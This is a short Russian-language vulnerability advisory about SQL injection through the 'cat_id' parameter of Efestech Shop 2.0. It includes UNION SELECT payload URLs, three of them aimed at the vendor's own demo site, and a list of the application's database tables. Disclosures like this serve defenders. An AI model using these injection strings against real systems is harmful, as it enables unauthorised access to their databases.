Программа: Efestech Shop 2.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «cat_id». Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Пример:

http://target.com/path/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar

Таблицы:

ayarlar
cat_eng
cat_tr
eng
lisans
mark_eng
mark_tr
product
subcat_eng
subcat_tr
tr
urun_resim

http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=
30+union+select+0+from+ayarlar
http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=
30+union+select+0+from+eng
http://www.efestech.com/demo/shop/?cmd=urunler&cat_id= 30+union+select+0+from+tr

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии